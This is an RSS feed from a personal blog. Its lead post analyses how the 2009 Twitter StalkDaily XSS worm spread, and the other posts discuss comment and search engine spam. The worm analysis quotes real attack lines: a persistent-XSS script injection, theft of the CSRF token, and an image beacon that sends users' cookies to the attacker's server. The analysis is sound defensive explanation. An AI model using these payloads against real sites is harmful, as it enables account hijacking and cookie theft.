<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>unitstep.net &#187; spam</title>
	<atom:link href="http://unitstep.net/blog/category/spam/feed/" rel="self" type="application/rss+xml" />
	<link>http://unitstep.net</link>
	<description>the home of peter chng</description>
	<lastBuildDate>Mon, 06 Feb 2012 01:23:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>How the Twitter StalkDaily Worm spread so fast</title>
		<link>http://unitstep.net/blog/2009/04/13/how-the-twitter-stalkdaily-worm-spread-so-fast/</link>
		<comments>http://unitstep.net/blog/2009/04/13/how-the-twitter-stalkdaily-worm-spread-so-fast/#comments</comments>
		<pubDate>Tue, 14 Apr 2009 03:50:40 +0000</pubDate>
		<dc:creator>Peter Chng</dc:creator>
				<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[social networking]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[web2.0]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[worm]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://unitstep.net/?p=847</guid>
		<description><![CDATA[If you use Twitter a lot (unlike me) you&#8217;ll likely have been alerted and worried about the presence of a worm that&#8217;s been making the rounds at the popular micro-blogging website. The so-called &#8220;StalkDaily&#8221; worm was first noticed on Saturday, and it appeared to be able to &#8220;infect&#8221; a user&#8217;s Twitter profile, causing random tweets [...]]]></description>
			<content:encoded><![CDATA[<p class="image align-right"><img src="http://unitstep.net/wordpress/wp-content/uploads/2009/04/biohazard.jpg" alt="biohazard" title="biohazard" width="100" height="145" class="alignnone size-full wp-image-853" /></p>
<p>If you use Twitter a lot (unlike me), you&#8217;ve likely been alerted to, and worried about, the <a href="http://www.techcrunch.com/2009/04/11/twitter-hit-by-stalkdaily-worm/">presence of a worm that&#8217;s been making the rounds</a> at the popular micro-blogging website.  The so-called &#8220;StalkDaily&#8221; worm was first noticed on Saturday, and it appeared to be able to &#8220;infect&#8221; a user&#8217;s Twitter profile, causing random tweets about the StalkDaily website (<strong>don&#8217;t go there</strong>) to show up on their profile.  Furthermore, other users&#8217; Twitter profiles could also become infected, seemingly <strong>only by viewing the profile of an infected user</strong>.</p>
<p>Eventually the <a href="http://gist.github.com/93782">source code of the worm was uncovered</a> (safe to view), and a quick analysis shows why it was able to spread through Twitter so fast.  Here&#8217;s an overview of how the worm worked.</p>
<h2>Overview</h2>
<p>The StalkDaily worm was apparently <a href="http://adjix.com/af5t">written by a person named &#8220;Mikeyy Mooney&#8221;</a>, who is evidently a 17-year-old from Brooklyn, New York.  He created the original worm, plus other derivatives that spread using the same mechanism but displayed different messages on the infected user&#8217;s profile.  The attack was not able to steal users&#8217; passwords, thanks to Twitter&#8217;s security configuration, but <a href="http://www.cbc.ca/technology/story/2009/04/13/twitter-worm.html">it nonetheless caused over 10,000 unauthorized tweets</a> to show up on users&#8217; profiles.</p>
<h2>Drilling down</h2>
<p>An analysis of the <a href="http://gist.github.com/93782">source code of the worm</a> yields some insight into how this malicious code was able to spread so effectively.  Specifically, the attack exploited a <a href="http://en.wikipedia.org/wiki/Cross-site_scripting#Persistent">Type 2 or persistent XSS vulnerability</a>, the most serious type, in order to achieve DOM/JavaScript injection into the Twitter site.</p>
<p>In this sort of attack, the attacker is able to inject arbitrary JavaScript into a page that is publicly viewable by any other user; in this case the page was a user&#8217;s profile.  This injected JavaScript was then used to &#8220;infect&#8221; the profile of the user who viewed the already-infected profile, causing the cycle to repeat.</p>
<p>Specifically, the &#8220;<acronym class="uttInitialism" title="Uniform Resource Locator">URL</acronym>&#8221; field of the user&#8217;s profile was targeted.  The contents of this field were apparently not sanitized on input, or were not properly converted to <acronym class="uttInitialism" title="HyperText Markup Language">HTML</acronym> entities when used as the value of the <code>href</code> attribute of the link to the user&#8217;s <acronym class="uttInitialism" title="Uniform Resource Locator">URL</acronym> or homepage/website.  This is seen in lines 104 and 109 of the source code, shown below:</p>
<pre><code>var xss = urlencode('http://www.stalkdaily.com"&gt;&lt;/a&gt;&lt;script src="http://mikeyylolz.uuuq.com/x.js"&gt;&lt;/script&gt;&lt;a ');
...
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&amp;user[url]="+xss+"&amp;tab=home&amp;update=update");</code></pre>
<p>The last line is where the user&#8217;s profile is updated to include the offending JavaScript; this essentially makes the user&#8217;s profile execute the worm&#8217;s source code, causing anyone who views the profile to become &#8220;infected&#8221; themselves.</p>
<p>Thus the attacker was able to exploit this to arbitrarily inject a SCRIPT tag into the DOM linking to a JavaScript file (<code>x.js</code>) on his site.  By doing this, he was able to get code he owned (the JavaScript file on his own website) to run at the privilege level of scripts on the Twitter.com domain.  This &#8220;privilege escalation&#8221; of sorts is what allowed the script to perform actions on behalf of the user, including infecting their profile to spread to others, and causing the user to tweet phrases of the attacker&#8217;s choice.</p>
<h2>Spreading</h2>
<p>Once infected, a user&#8217;s profile would contain a link to the malicious JavaScript as described above.  This is because the user&#8217;s profile shows a link to their website <acronym class="uttInitialism" title="Uniform Resource Locator">URL</acronym>, which had been altered to inject the malicious JavaScript residing on the attacker&#8217;s server.  Because of this, <strong>anyone who was logged into Twitter and viewed an infected user&#8217;s profile would themselves be infected</strong>, and their profile would then become a vector for transmission of the worm, completing the cycle.</p>
<p>The source code also shows that each time you viewed an infected profile, the script would cause you to randomly tweet one of six different phrases, all of which linked to the StalkDaily website.  It appears the <a href="http://adjix.com/b52w">attacker was trying to promote his website this way</a>, but it&#8217;s also possible that visiting this website could cause you to become infected.  While viewing a resource directly on the StalkDaily website could not infect you, due to the same-origin policy, it&#8217;s possible that a hidden <code>iframe</code> could be included on the site, pointing towards the profile of an infected user.  This would cause you to become infected.</p>
<h2>Why XSS is so important to prevent</h2>
<p>Cross-site scripting attacks, or XSS for short, essentially occur because user-input data is not properly sanitized prior to being committed to persistent storage, or is not properly escaped into <acronym class="uttInitialism" title="HyperText Markup Language">HTML</acronym> entities before being output to a webpage or displayed.  This can allow a malicious user to inject or alter the structure of the DOM, inserting <code>script</code> tags to inject their own arbitrary JavaScript into your website.</p>
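<p>As a rough illustration of the output-escaping half of that defence, here is a minimal sketch.  The function names (<code>escapeHtml</code>, <code>renderProfileLink</code>) and the scheme check are assumptions made for this example; this is not Twitter&#8217;s actual code, and a real application would normally rely on its templating library&#8217;s escaping.</p>

```javascript
// Hypothetical helpers for illustration only; not taken from Twitter's code.

// Replace the characters that can change HTML structure with entities.
function escapeHtml(text) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Build the profile's homepage link. Anything that is not an http(s) URL
// is dropped, and the value is escaped before it reaches the href attribute.
function renderProfileLink(url) {
  if (!/^https?:\/\//i.test(url)) {
    return "";
  }
  const safe = escapeHtml(url);
  return '<a href="' + safe + '">' + safe + "</a>";
}

// A harmless stand-in for a value that tries to close the attribute early.
const hostile = 'http://example.com"><b>injected</b><a href="';
console.log(renderProfileLink(hostile));
```

<p>With the quote and angle brackets converted to entities, the whole value stays inside the <code>href</code> attribute instead of ending it and starting new markup.</p>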
<p>This attack demonstrates the need to effectively guard against these vulnerabilities, because such flaws can undermine other security precautions you have taken.  For example, the source code of the worm shows that Twitter was using an &#8220;authentication token&#8221; for all form submissions in order to prevent <a href="http://en.wikipedia.org/wiki/Cross-site_request_forgery">Cross-site Request Forgery (CSRF) attacks</a>.  This essentially uses a temporary, random value to ensure that a form was submitted from the Twitter website itself, so that an arbitrary website cannot submit a form request to Twitter on behalf of a user.</p>
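<p>The token scheme just described might look roughly like the following server-side sketch in Node.js.  The <code>session</code> object and the function names are hypothetical stand-ins; the worm&#8217;s source only reveals that Twitter&#8217;s pages carried a token, not how it was generated or checked.</p>

```javascript
const crypto = require("node:crypto");

// Hypothetical: `session` is a plain object standing in for server-side
// session storage tied to the logged-in user.
function issueToken(session) {
  // A fresh random value that is embedded in every form the site renders.
  session.csrfToken = crypto.randomBytes(32).toString("hex");
  return session.csrfToken;
}

// Accept a form submission only if it carries the token issued to this session.
function isValidToken(session, submitted) {
  if (typeof submitted !== "string" || typeof session.csrfToken !== "string") {
    return false;
  }
  const expected = Buffer.from(session.csrfToken);
  const actual = Buffer.from(submitted);
  // timingSafeEqual requires equal-length inputs, so compare lengths first.
  return expected.length === actual.length && crypto.timingSafeEqual(expected, actual);
}

const session = {};
const token = issueToken(session);
console.log(isValidToken(session, token));     // form rendered by the site itself
console.log(isValidToken(session, "guessed")); // request forged by another site
```

<p>A page on another domain cannot read the token out of the site&#8217;s HTML, so it cannot include the right value in a forged request.</p>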
<p>This can normally prevent malicious websites from performing actions on your behalf without your knowledge; however, because the XSS vulnerability allowed for DOM/script injection, the attacker&#8217;s script (on a separate domain) was able to run with the same privileges as a script on Twitter&#8217;s own site.  Thus, it was able to read the &#8220;authentication token&#8221; value from the <acronym class="uttInitialism" title="HyperText Markup Language">HTML</acronym> of the Twitter webpage, and use it to properly craft form submission data to alter the user&#8217;s profile and tweet on their behalf.  This is seen on lines 85-90:</p>
<pre><code>var content = document.documentElement.innerHTML;

authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);</code></pre>
<p>Note that using a cookie to store the authentication token would not have prevented this.  Because the script was running within the scope of the Twitter.com domain, it would be able to access the user&#8217;s cookies!  In fact it does exactly this, and furthermore it sends your cookies to the attacker&#8217;s server so they can keep a log of them!  Lines 78-81 show this (the username is obtained from the DOM, much like the authentication token):</p>
<pre><code>var cookie;
cookie = urlencode(document.cookie);
document.write("&lt;img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&amp;username=" + username + "'&gt;");
document.write("&lt;img src='http://stalkdaily.com/log.gif'&gt;");</code></pre>
<h2>Other notes</h2>
<p>Obviously central to this problem is the ability of scripts on other domains to run within the scope of another domain simply by being linked to on the page via a <code>script</code> element.  This allows scripts not under the control of the originating domain to be able to access cookies and other information that would not be normally accessible.  </p>
<p>However, this ability also allows useful services such as Google Analytics and other third-party services/APIs such as Google Maps, to work easily across different websites, allowing services to expose their features through a JavaScript API.  Thus, making browsers reject third-party SCRIPT tags would cause serious usability problems; a better idea is to use a Firefox plugin like <a href="https://addons.mozilla.org/en-US/firefox/addon/722">NoScript</a> so that the user can have fine-grained control over issues like this. </p>
<p>Another point of interest in the source code is that the bulk of it consists of utility functions.  The actual malicious code only takes up the last third of the file or so.  For example, the function <code>XHConn()</code> is simply a standard cross-browser compatible implementation of <a href="http://en.wikipedia.org/wiki/XMLHttpRequest">XMLHttpRequest</a>, the API used for the Ajax requests necessary to alter the user&#8217;s profile.  Additionally, the <code>urlencode()</code> function is another utility function that allows values like the user&#8217;s cookies and the actual malicious <code>script</code> tag to be properly submitted in the Ajax request.</p>
<p>Lastly, the malicious code is set to be executed 3250 ms after the script is fully loaded (line 111).  This is likely a crude way to ensure that the DOM is fully loaded and ready to be traversed to find things like the username and authentication token, used instead of hooking into an event like <code>window.onload</code>.</p>
<h2>Concluding remarks</h2>
<p>This analysis identifies the following points:</p>
<ol>
<li>The worm spreads by updating your profile <acronym class="uttInitialism" title="Uniform Resource Locator">URL</acronym> to include the malicious script.</li>
<li>Simply viewing the profile of an infected user is sufficient to cause your profile to become infected.</li>
<li>Every time you view the profile of an infected user, including your own, the worm will cause you to automatically tweet one of the random messages.</li>
<li>The random tweets from an infected user <strong>do not</strong> appear to contain the malicious code, probably because output here has been protected against that.</li>
<li>The worm steals the cookies you have set for the Twitter.com domain, along with your username, but thankfully no password information is stolen since Twitter does not store that sort of information in cookies.  It also appears to log each visit to an infected user&#8217;s profile.</li>
<li>Visiting a third-party site (such as the StalkDaily website) may infect your Twitter profile if a hidden iframe has been included, pointing towards the profile of an infected user.  This can be hard to detect, so using something like the <a href="https://addons.mozilla.org/en-US/firefox/addon/722">NoScript Firefox extension</a> is recommended.</li>
</ol>
<p>Note that this is not a criticism of Twitter itself, as designing any web application is difficult from a security perspective; it&#8217;s also worthwhile to note that Twitter responded quickly to this issue, within hours on a Saturday.  They appeared to have the <a href="http://blog.twitter.com/2009/04/wily-weekend-worms.html">situation under control as of yesterday</a>, had patched the hole and were on their way to cleaning up infected users&#8217; profiles.  Understandably they are very upset and I hope they are able to sort the whole issue out.</p>
<hr/>Copyright &copy; 2012 <strong><a href="http://unitstep.net">unitstep.net</a></strong>. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact <strong><a href="mailto:webmaster@unitstep.net">webmaster@unitstep.net</a></strong> for more information.<br/><span style="float: right;font-size: 7pt"><a href="http://blog.taragana.com/index.php/archive/wordpress-plugins-provided-by-taraganacom/">Plugin</a> by <a href="http://www.taragana.com/">Taragana</a></span>]]></content:encoded>
			<wfw:commentRss>http://unitstep.net/blog/2009/04/13/how-the-twitter-stalkdaily-worm-spread-so-fast/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Passing the 100,000 mark</title>
		<link>http://unitstep.net/blog/2008/01/12/passing-the-100000-mark/</link>
		<comments>http://unitstep.net/blog/2008/01/12/passing-the-100000-mark/#comments</comments>
		<pubDate>Sun, 13 Jan 2008 02:10:16 +0000</pubDate>
		<dc:creator>Peter Chng</dc:creator>
				<category><![CDATA[akismet]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://unitstep.net/blog/2008/01/12/passing-the-100000-mark/</guid>
		<description><![CDATA[This week, Akismet reported that it had blocked its 100,000th spam comment on my site/blog. While that&#8217;s not a remarkable number, in light of how little traffic my site gets that figure becomes somewhat more significant. Since this site has only been around for just over one and a half years (19 months), that works [...]]]></description>
			<content:encoded><![CDATA[<p>This week, <a href="http://akismet.com/">Akismet</a> reported that it had blocked its 100,000th spam comment on my site/blog.  While that&#8217;s not a remarkable number, in light of how little traffic my site gets that figure becomes somewhat more significant.  Since this site has only been around for just over one and a half years (19 months), that works out to roughly 5200 spam comments every month, or roughly 1200 every week.  Note that the current averages are actually much higher, since in the beginning I got a lot less spam before the bots discovered my site.</p>
<p>Props definitely go out to <a href="http://automattic.com/">Automattic</a> for creating such a reliable and accurate service.  When I <a href="/blog/2006/07/31/comment-spam-evolution/">first wrote about it</a> over a year ago, I was very impressed with its precise filtering of spam and non-spam (aka <dfn>ham</dfn>) comments along with its unobtrusiveness.  Akismet truly makes spam filtering transparent to the end user, unlike other methods such as CAPTCHAs.</p>
<p>Of course, I can&#8217;t forget to thank the developers of <a href="http://wordpress.org/">WordPress</a> as well.  Without them, I would have no site to protect from spam. <img src='http://unitstep.net/wordpress/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Check back later when this site surpasses the 1,000,000 mark for spam.</p>
]]></content:encoded>
			<wfw:commentRss>http://unitstep.net/blog/2008/01/12/passing-the-100000-mark/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Akismet problems</title>
		<link>http://unitstep.net/blog/2006/08/27/akismet-problems/</link>
		<comments>http://unitstep.net/blog/2006/08/27/akismet-problems/#comments</comments>
		<pubDate>Sun, 27 Aug 2006 15:23:48 +0000</pubDate>
		<dc:creator>Peter Chng</dc:creator>
				<category><![CDATA[akismet]]></category>
		<category><![CDATA[comment spam]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://unitstep.net/blog/2006/08/27/akismet-problems/</guid>
		<description><![CDATA[I&#8217;ve been using Akismet to control comment spam and so far, its performance has been excellent &#8211; out of close to 300 comments, it didn&#8217;t report a single false positive and only let through one or two cleverly-crafted comments. However, for some reason, in the past day it&#8217;s started letting through comments that are clearly [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been using <a href="http://akismet.com/">Akismet</a> to control <a href="http://unitstep.net/blog/2006/07/31/comment-spam-evolution/">comment spam</a> and so far, its performance has been excellent &#8211; out of close to 300 comments, it didn&#8217;t report a single false positive and only let through one or two cleverly-crafted comments.  However, for some reason, in the past day it&#8217;s started letting through comments that are clearly spam, and I&#8217;ve had to manually label them as such and then delete them.</p>
<p>I wonder if this is related to the <a href="http://akismet.com/blog/2006/08/better-stats/">recent update</a> to the system (as it&#8217;s a centralized service), or something else.  The update seemed to be only related to improving the statistics tracking of the service, and not something related to the spam-detection algorithm.  I&#8217;ve tried disabling/enabling the plugin, so we&#8217;ll see if that helps &#8211; has anyone else been having these problems?</p>
]]></content:encoded>
			<wfw:commentRss>http://unitstep.net/blog/2006/08/27/akismet-problems/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Comment spam evolution</title>
		<link>http://unitstep.net/blog/2006/07/31/comment-spam-evolution/</link>
		<comments>http://unitstep.net/blog/2006/07/31/comment-spam-evolution/#comments</comments>
		<pubDate>Tue, 01 Aug 2006 01:54:42 +0000</pubDate>
		<dc:creator>Peter Chng</dc:creator>
				<category><![CDATA[spam]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://unitstep.net/blog/2006/07/31/comment-spam-evolution/</guid>
		<description><![CDATA[Spam is pervasive; it is everywhere. If Ben Franklin were alive today, he&#8217;d probably be quoted as saying that &#8220;In this world nothing is certain but death and spam&#8221;. In fact, it&#8217;s one of the major downsides of the web as we know it. With increased availability of information comes the inevitability of spam &#8211; [...]]]></description>
			<content:encoded><![CDATA[<p>Spam is pervasive; it is everywhere.  If Ben Franklin were alive today, he&#8217;d probably be <a href="http://www.brainyquote.com/quotes/authors/b/benjamin_franklin.html">quoted</a> as saying that <em>&#8220;In this world nothing is certain but death and <strong>spam</strong>&#8221;</em>. In fact, it&#8217;s one of the major downsides of the web as we know it.  With increased availability of information comes the inevitability of spam &#8211; direct consumer marketing thrown in alongside legitimate content that decreases the SNR (Signal-to-noise Ratio), effectively making it harder to find quality, real information on the Internet. </p>
<h3>In the old days&#8230;</h3>
<p>Back a few years ago, the big thing was e-mail spam.  It&#8217;s been around so long that almost anyone who&#8217;s used e-mail knows about it.  All those e-mails telling you how to re-finance your mortgage, get low-cost prescription drugs or how to grow a certain appendage longer tended to fill up one&#8217;s inbox, making it a pain to delete all of them and find the real e-mail that you needed to read.  </p>
<p>For those of you thinking that e-mail spam was just a big annoyance, <a href="http://www.dmnews.com/cms/dm-news/internet-marketing/35135.html">recent polls</a> have shown that people apparently do make purchases from spam e-mails, making it a viable direct marketing tactic.  However, server-side e-mail spam filters have greatly increased in their ability to weed out junk e-mails in the past few years, so for many people, spam is not as big of a problem as it once was.  Unless you&#8217;re <a href="http://unitstep.net/blog/2006/07/26/windows-live-mail-slow-bloated-and-not-very-usable/">using Hotmail</a>.</p>
<h3>Adapt or die</h3>
<p>Faced with the prospect of decreased income thanks to e-mail spam filters (or just wanting to make more money), spammers began a new front in the war of direct marketing.  They began to spam forums, guestbooks and most recently, commenting systems on various sites in the hopes of drawing attention to the products they were advertising.  The purpose was the same &#8211; to encourage people to buy products, mostly the same ones they had been advertising in mass e-mails.  So, while e-mail spam has not gone away in recent times, alternative forms of spam have increased many times over.  </p>
<p>In fact, spamming online communities with messages may even be more effective, since a spammer needs only to get their message on one site in order for it to be viewed by many.  However, since spam tended to be easy to distinguish from comments posted by humans, it was relatively easy for developers to combat this by building in anti-spam features to weed out spam.  Spammers responded by making their &#8220;bots&#8221; &#8211; the automated programs that sent out the spam messages &#8211; better and trying to make the &#8220;quality&#8221; of their messages seem more &#8220;human&#8221;.</p>
<h3>A personal experience</h3>
<p>My site, <a href="http://unitstep.net">unitstep.net</a>, is far from a popular site.  However, spam bots have still managed to find this site and I&#8217;ve logged 104 spam comments in just over two months&#8217; worth of operation.  That&#8217;s quite impressive, and shows that spammers are actively searching for new blogs to spam.  As <a href="http://unitstep.net/blog/2006/06/19/search-engine-spam/">I mentioned before</a>, some comment spam is aimed at promoting other websites in order to increase their ranking in SERPs (Search Engine Results Pages), thus drawing unsuspecting visitors to their sites, where they are served up advertising that looks like regular content.  (WordPress and most blogs add an attribute of <code>rel="nofollow"</code> to comment links to defeat this, but they still try.)  Most of the spam I&#8217;ve got has been of the direct marketing variety, though.</p>
<p>If you haven&#8217;t seen the comment spam though, it&#8217;s because of <a href="http://akismet.com/">Akismet</a>, a truly kick-ass plugin for WordPress, written by the same team.  It basically uses a central authority to check on every comment that&#8217;s submitted, and analyzes its content to determine if it&#8217;s likely to be spam, or likely to be real.  Comments that are marked as spam aren&#8217;t shown, and are instead put in a moderation queue for me to look at and either delete or, in the case of a false positive, allow through.  Akismet appears to learn as well, so its success rate increases the longer it&#8217;s been in use.  I apparently joined relatively late in the game, as I have yet to find Akismet report a false positive or let a spam comment through. </p>
<p>Until today.</p>
<p>However, I don&#8217;t blame Akismet for this one, as I was almost caught off guard.  Here was the content of the comment:</p>
<blockquote><p>Plato learning&#8230;</p>
<p>I am Karin, very interesting article that contained the information I was searching for in Google, thanks&#8230;.</p></blockquote>
<p>Upon closer inspection, the comment does look like a spammer&#8217;s, since it didn&#8217;t specifically relate to the post&#8217;s topic, instead using a generalized statement.  The first sentence also made no sense.  But, what threw me off was the lack of links in the post &#8211; the spam bot had just instead used the regular &#8220;homepage&#8221; field to fill in the <acronym class="uttInitialism" title="Uniform Resource Locator">URL</acronym> of their spam blog &#8211; or splog &#8211; in the hopes that someone would visit it.</p>
<p>In fact, due to my curiosity, I had to visit the site to see what was on it.  (This was, of course, how I determined it to be a splog.)  The splog consisted of a load of nonsensical posts, and of course, lots of ads, by Google no less.  Since it&#8217;s against the terms-of-service of Google Adsense to make a site <em>for the direct purpose of displaying Google ads</em>, this spammer is obviously in clear violation of the program&#8217;s terms.  The spam blog wasn&#8217;t littered with links though (besides the ads), and the posts would look human after only a quick check &#8211; a closer inspection reveals sentences merged together into nonsensical, run-on paragraphs.</p>
<h3>The Turing test</h3>
<p>All of the efforts by current spammers reminded me of the <a href="http://en.wikipedia.org/wiki/Turing_Test">Turing Test</a>.  Basically, it&#8217;s a concept that if a person communicating with a computer cannot reliably tell if they are communicating with a computer or a human, then that computer system is said to have passed the test.  Turing thought it was a better way of evaluating a computer over the question of &#8220;Can a computer think?&#8221;</p>
<p>In a way, spam and anti-spam techniques are engaged in some sort of Turing test, except that it&#8217;s a computer system (the anti-spam system) that is trying to determine if an entity is a computer (spambot) or a real human.  The anti-spam techniques described above have typically been widely used, along with <a href="http://en.wikipedia.org/wiki/Captcha">CAPTCHAs</a> or other &#8220;tests&#8221; that the typical human can easily do, but are relatively hard to design into a computer program or system.</p>
<p>However, as programming techniques and algorithms advance, the spam/anti-spam war is sure to heat up.  As seen by some of the comment spam I&#8217;ve started to get, spammers are getting better with the bots they produce.  They&#8217;re moving away from posting messages that are heavily laden with links to gambling/porn sites that are obviously spam, to posting messages that could have conceivably come from a human, with only the regular home page link that any curious visitor might click.  As these techniques advance, it&#8217;s entirely possible that a spam bot could read a blog post, analyze the content, and post a reasonably-specific message that contained a few links here and there to spam sites.  The same goes for CAPTCHAs as well &#8211; advances in image processing are making optical character recognition more and more accurate.</p>
<p>The end result is, as I mentioned at the beginning, a lower SNR and lower quality of information on the web.  Not only will more useless spam information be disseminated, making it more likely to find crap rather than helpful information when doing a search &#8211; but it&#8217;ll also be harder to post actual information that isn&#8217;t incorrectly labelled as spam.  For example, if spam bots were able to post vaguely post-specific comments to sites, then quick remarks by people, such as <em>&#8220;Thanks for the useful information!&#8221;</em>, might also get labelled as spam.  Same goes for CAPTCHAs &#8211; if we make the images more distorted and the characters harder to read, people might also have trouble &#8211; I know I do on some of them &#8211; and this creates another problem of accessibility for the disabled.</p>
<p>This isn&#8217;t to say I&#8217;ve lost hope.  Akismet, so far, has only missed one comment &#8211; and I would have missed it had I not visited the linked site.  So, it hasn&#8217;t really let me down.  Others have had <a href="http://www.darcynorman.net/2006/06/24/20-000-spam-attempts-per-day-and-counting">similar success</a>, so for now, I think anti-spam techniques have the upper hand.  Spam is merely an annoyance and a statistic currently, and I hope it stays that way.  What I&#8217;ve talked about in this entry could be viewed as a <a href="http://unitstep.net/blog/2006/07/22/black-dawn-the-next-pandemic-or-bird-flu-the-worst-case/">worst-case scenario</a> of sorts.</p>
<p>Now, excuse me while I press &#8220;Delete All&#8221; on the spam comment moderation queue.</p>
]]></content:encoded>
			<wfw:commentRss>http://unitstep.net/blog/2006/07/31/comment-spam-evolution/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Search engine spam</title>
		<link>http://unitstep.net/blog/2006/06/19/search-engine-spam/</link>
		<comments>http://unitstep.net/blog/2006/06/19/search-engine-spam/#comments</comments>
		<pubDate>Tue, 20 Jun 2006 02:42:43 +0000</pubDate>
		<dc:creator>Peter Chng</dc:creator>
				<category><![CDATA[google]]></category>
		<category><![CDATA[search engine]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://www.unitstep.net/blog/2006/06/19/search-engine-spam/</guid>
		<description><![CDATA[I recently read about how Google was the latest victim of search engine spam, or the intentional creation of useless pages in order to get a high ranking or listing on a search engine results page. The story was later Dugg, and you may have seen it on my &#8220;Recently visited&#8221; list. While Google has [...]]]></description>
			<content:encoded><![CDATA[<p>I recently <a href="http://googlesystem.blogspot.com/2006/06/billions-of-spam-pages-indexed-by.html">read about</a> how Google was the latest victim of search engine spam, or the intentional creation of useless pages in order to get a high ranking or listing on a search engine results page.  The story was later <a href="http://digg.com/technology/How_One_Spammer_Got_BILLIONS_of_Pages_into_Google_in_3_Weeks">Dugg</a>, and you may have seen it on my &#8220;Recently visited&#8221; list.  While Google has fixed this particular problem, this type of Internet spam has been growing at a very fast pace for the past few years, for a few reasons, and will probably outgrow conventional e-mail spam in the future.  It presents its own set of unique problems, many of which have yet to be solved by Google or, in my opinion, by other search engines.</p>
<p>
During this latest round of spamming, which reached its peak this weekend, it appears that well over 5 billion spam pages were indexed by Google.  While this by itself is a huge number, taken in context with the total number of pages that Google had indexed at the time (around 25 billion, according to the source in the first link), it is simply astonishing.  What&#8217;s even more impressive, or scary, is the fact that the site was started less than a month ago, making this intrusion into the Google search indexes not only massive, but frighteningly fast as well.
</p>
<p>
From reading the posts at Digg, and from the <a href="http://merged.ca/monetize/flat/how-to-get-billions-of-pages-indexed-by-Google.html">resultant link</a>, it appears the spammer used a script to serve up articles based on keywords, and furthermore, utilized many topical subdomains to generate content that would appear &#8220;high&#8221; on the keywords list, and thus be indexed by Google.  Comment spam (on forums, blogs, and the like) may or may not have played a role in getting the pages ranked higher, but one thing is for certain &#8211; these useless pages made it <em>very</em> high onto the search results page, in many cases filling multiple spots in the top 10 results.  These searches were for common terms, such as &#8220;war on terror pros cons&#8221; and &#8220;pizza sauce recipe&#8221;.
</p>
<p>
But what&#8217;s the reason for this? Well, the same as for any spam marketing campaign &#8211; advertising.  Because of the currently huge market for Internet advertising, the potential for making lots of money off ads on popular sites is an opportunity many cannot turn down.  You&#8217;re likely to see these somewhat unobtrusive text ads on most any popular site nowadays &#8211; in fact it was Google who first popularized them as a replacement for the annoying animated graphic banner ads and popups, which put off many viewers.  This form of advertising is, undoubtedly, the backbone of many web 2.0 companies.  Companies like <a href="http://digg.com">Digg</a>, <a href="http://flickr.com">Flickr</a> and even <a href="http://google.com">Google</a> rely on ads for nearly 100% of their revenue.
</p>
<p>
But this potential has turned many to the dark side of advertising &#8211; creating spam sites whose sole purpose is to attract viewers for increased ad viewing.  While successful web 2.0 companies may display ads on their sites, they all offer some useful service that people return for.  These spam sites do not offer any useful service or information, but instead manipulate search engine results in order to trick users into visiting them.  Once there, the user will find only semi-meaningful information intricately laced with ads, or perhaps no information and only ads.  While this clearly violates many ad providers&#8217; terms of service (such as those of Google AdWords), most of these sites have no problem doing this or finding marketers who don&#8217;t care about such trivial things.
</p>
<p>
This is perhaps the other side of the double-edged sword that is the Internet.  On the one hand, forums, blogs, and other community-based sites offer an immense capacity for spreading useful information.  On the other hand, they also offer the ability to spread <em>useless</em> information, and in some cases, search engines cannot yet discriminate between the two as most humans would.  This can be seen in the huge amounts of comment spam and spam blogs that pervade the Internet.
</p>
<p>
All of this creates problems on many levels, and in many ways, is more damaging than e-mail spam.  While e-mail spam is annoying for the junk it creates in our inboxes, and the extra bandwidth it consumes, for the most part anti-spam tools have helped curb this influx.  However, search engine spam targets the most basic use of the Internet, and that is the ability to find useful information.  With all the spam sites out there, and the manipulation of search engine results that comes from this, the ability to conduct a search that returns useful information may be compromised in the future if proper countermeasures are not employed.
</p>
<p>
Furthermore, it creates a nightmare for the people who engineer the search engines, as they must find a way to tweak the algorithms to prevent this from happening again.  In the process, false positives may be generated, and legitimate sites may be unintentionally delisted, causing further headaches.  Google has been having <a href="http://www.sitepoint.com/forums/showthread.php?t=388258">delisting problems</a> as of late, and one wonders if this is related to the recent spamming problem.
</p>
<p>
